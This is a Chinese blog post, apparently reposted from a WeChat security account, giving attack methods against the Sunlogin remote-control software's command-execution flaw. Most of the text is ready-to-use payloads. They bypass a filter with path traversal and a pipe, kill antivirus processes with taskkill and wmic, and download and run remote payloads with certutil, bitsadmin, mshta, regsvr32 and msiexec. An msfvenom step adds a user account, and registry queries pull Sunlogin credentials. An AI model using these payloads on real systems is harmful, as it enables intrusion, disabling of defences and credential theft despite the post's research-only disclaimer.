0x001 第一种方法
添加管道符即可,绕过匹配的规则
ping../../../../../../../../../windows/system32/cmd.exe+/c|cmd+/c+whoami
0x002 第二种方法
得知向日葵默认是system权限,那就可以直接去taskkill杀软了 (比较残忍,还得防止自启之类)
ping../../../../../../../../../windows/system32/taskkill+/f+/pid+1111
然后再去执行命令之类的,就比较方便了
0x003 第三种方法
certutil
certutil -urlcache -split -f http://x.x.x.x/only.exe
cmd.exe /c only.exe
bitsadmin
bitsadmin /transfer n http://x.x.x.x/1.txt C:Usersf0ngf0ng\1.txt
IEexec
exec CMD='net user only onlysecurity /add' -f msi > evil.msi 在攻击机器上生成msi包 msfvenom -p windows/
在目标机器上远程执行(直接写payload的ip和文件) msiexec /q /i http://x.x.x.x/evil.msi
mshta
mshta http://x.x.x.x/run.hta
regsvr32
regsvr32.exe /u /n /s /i:http://x.x.x.x/1.sct scrobj.dll
wmic
比如也可以调用wmic去停止杀软进程等等
ping../../../../../../../../../windows/system32/wbem/wmic+process+where+name%3d'360TRAY.exe'+call+terminate
0x004 第四种方法
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInfo
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo
0x04 总结
参考链接:
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/
https://www.cnblogs.com/xiaozi/p/12721960.html
https://github.com/wafinfo/Sunflower_get_Password
原文始发于微信公众号(only security):向日葵漏洞思考
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论